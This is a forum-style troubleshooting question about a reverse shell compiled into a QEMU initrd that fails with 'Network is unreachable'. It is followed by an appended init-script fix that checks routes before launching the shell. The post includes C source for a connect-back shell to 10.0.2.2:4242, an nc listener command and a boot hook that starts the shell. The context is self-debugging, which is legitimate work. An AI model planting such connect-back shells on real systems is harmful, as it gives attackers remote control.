I have a .cpio file containing a filesystem that is loaded as initrd for a QEMU emulation. Here's the run.sh script:

```sh
#!/bin/sh
qemu-system-arm \
-m 1024 \
-M virt,highmem=off \
-kernel zImage \
-initrd filesystem.cpio \
-nic user,hostfwd=tcp:0.0.0.0:8080-:80 \
-nographic
```
Since I want to spawn a reverse shell, I statically compiled one and included it in the /bin folder of the decompressed filesystem. The executable tries to establish a TCP connection with 10.0.2.2:4242 (which I saw is QEMU's gateway address) and then launch /bin/bash.

This is the code for my revshell:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(void) {
    int sockfd;
    struct sockaddr_in serv_addr;

    printf("Launching reverse shell...\n");
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == -1) {
        perror("Socket creation failed");
        exit(EXIT_FAILURE);
    }

    /* zero the structure so padding/unused fields are defined */
    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(4242);
    serv_addr.sin_addr.s_addr = inet_addr("10.0.2.2"); /* QEMU user-mode gateway */
    printf("Trying to connect to %s on port %d...\n", inet_ntoa(serv_addr.sin_addr), ntohs(serv_addr.sin_port));
    if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) != 0) {
        perror("Connection with the server failed");
        exit(EXIT_FAILURE);
    }
    printf("Connected successfully. Executing shell...\n");

    /* attach stdin/stdout/stderr to the socket */
    dup2(sockfd, STDIN_FILENO);
    dup2(sockfd, STDOUT_FILENO);
    dup2(sockfd, STDERR_FILENO);
    /* [etc...] */
```
To execute the reverse shell, I modified the init file accordingly and compressed everything back.

This is the init file:

```sh
#!/bin/busybox ash
/bin/busybox mount -t sysfs sysfs /sys
/bin/busybox mount -t proc proc /proc
/bin/busybox mount -t tmpfs tmpfs /dev
/bin/busybox mkdir -p /dev/shm
/bin/busybox mkdir -p /dev/pts
/bin/busybox mount -t devpts devpts /dev/pts
/bin/busybox mount -t debugfs none /sys/kernel/debug
# Populate /dev according to /sys
/bin/busybox mknod -m 660 console c 5 1
/bin/busybox mknod -m 660 null c 1 3
/bin/busybox mdev -s
/bin/busybox --install -s
echo "Welcome!" > /dev/console
/bin/reverseshell &
exec /sbin/init "$@" </dev/console >/dev/console 2>&1
```
As you can see, I already have a console that spawns as soon as the virtualization starts, but it's full of junk and QEMU errors; that's why I need a reverse shell.

Then, I set up a netcat listener on port 4242 via `nc -lnvp 4242`.

However, when launching the run.sh script, I end up with the following errors:
```
...
[ 1.001342] Freeing unused kernel image (initmem) memory: 2048K
[ 1.007212] Run /init as init process
Welcome!
Launching reverse shell...
Trying to connect to 10.0.2.2 on port 4242...
Connection with the server failed: Network is unreachable
...
```
And no connection is received by the listener on my host. I am pretty much a noob with QEMU, and I do not know many of its features. Can you help me with this issue? Thanks in advance :)
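The "Network is unreachable" error above is what `connect()` returns when the guest's routing table has no route covering the destination, which is the case when an interface has never been brought up. The following is an added example, not code from the post or from QEMU or BusyBox, showing how an initramfs init script can check the guest's routing table (in the `/proc/net/route` format) before starting the connect-back helper, and report the cause on the console instead of failing silently. It assumes the guest interface is `eth0`, that the BusyBox `ip` and `udhcpc` applets are installed by `--install -s`, and that `/usr/share/udhcpc/default.script` exists so `udhcpc` can configure the interface; the sample route tables at the bottom are constructed.

```sh
#!/bin/sh
# Added example (not from the original post): routing-table checks an init
# script can run before launching a connect-back helper. Assumptions: eth0,
# busybox ip/udhcpc applets, /usr/share/udhcpc/default.script present.

# Convert a dotted-quad IPv4 address to a 32-bit integer.
ip_to_int() {
    IFS=. read -r _a _b _c _d <<EOF
$1
EOF
    echo $(( (_a << 24) | (_b << 16) | (_c << 8) | _d ))
}

# /proc/net/route prints addresses as 8 hex digits in little-endian byte
# order ("0202000A" is 10.0.2.2). Reverse the byte pairs, then convert.
hex_le_to_int() {
    _h=$1
    _b1=${_h%??????}            # first byte pair
    _b4=${_h#??????}            # last byte pair
    _m=${_h#??}; _m=${_m%??}    # middle two pairs
    _b2=${_m%??}; _b3=${_m#??}
    echo $(( 0x$_b4$_b3$_b2$_b1 ))
}

# Read /proc/net/route-format text on stdin; return 0 if some route
# (a default route, or a network whose mask matches) covers address $1.
route_covers() {
    _addr=$(ip_to_int "$1")
    while read -r _iface _dest _gw _flags _ref _use _metric _mask _rest; do
        [ "$_iface" = "Iface" ] && continue      # skip the header line
        [ -z "$_mask" ] && continue              # skip blank or short lines
        _d=$(hex_le_to_int "$_dest")
        _m=$(hex_le_to_int "$_mask")
        [ $(( _addr & _m )) -eq "$_d" ] && return 0
    done
    return 1
}

# Poll the live routing table for up to $2 seconds until $1 is routable.
wait_for_route() {
    _n=${2:-10}
    while [ "$_n" -gt 0 ]; do
        route_covers "$1" < /proc/net/route && return 0
        sleep 1
        _n=$(( _n - 1 ))
    done
    return 1
}

# The sequence an init script would run in place of a bare "/bin/reverseshell &".
init_network_then_launch() {
    ip link set eth0 up || echo "eth0: link up failed" > /dev/console
    udhcpc -i eth0 -n -q || echo "eth0: no DHCP lease" > /dev/console
    if wait_for_route 10.0.2.2 10; then
        /bin/reverseshell &
    else
        echo "10.0.2.2 not routable; not starting reverseshell" > /dev/console
        cat /proc/net/route > /dev/console
    fi
}

# Constructed sample tables: a configured guest (default route via 10.0.2.2
# plus the 10.0.2.0/24 link route) and an unconfigured one (header only).
SAMPLE_ROUTE_UP='Iface Destination Gateway Flags RefCnt Use Metric Mask MTU Window IRTT
eth0 00000000 0202000A 0003 0 0 0 00000000 0 0 0
eth0 0002000A 00000000 0001 0 0 0 00FFFFFF 0 0 0'
SAMPLE_ROUTE_DOWN='Iface Destination Gateway Flags RefCnt Use Metric Mask MTU Window IRTT'

# Only run the init sequence when explicitly asked (e.g. from /init: sh netcheck.sh --init).
case "${1:-}" in
    --init) init_network_then_launch ;;
esac
```

Run against `SAMPLE_ROUTE_DOWN`, `route_covers 10.0.2.2` fails, which is exactly the state the post's console output shows: the kernel has booted, but nothing in `init` has brought `eth0` up or assigned it an address, so there is no route for `connect()` to use. With the `--init` path wired into `/init` before `exec /sbin/init`, the console reports which step failed (link, lease, or route) and dumps the routing table, which is more useful for debugging than the single `perror` line.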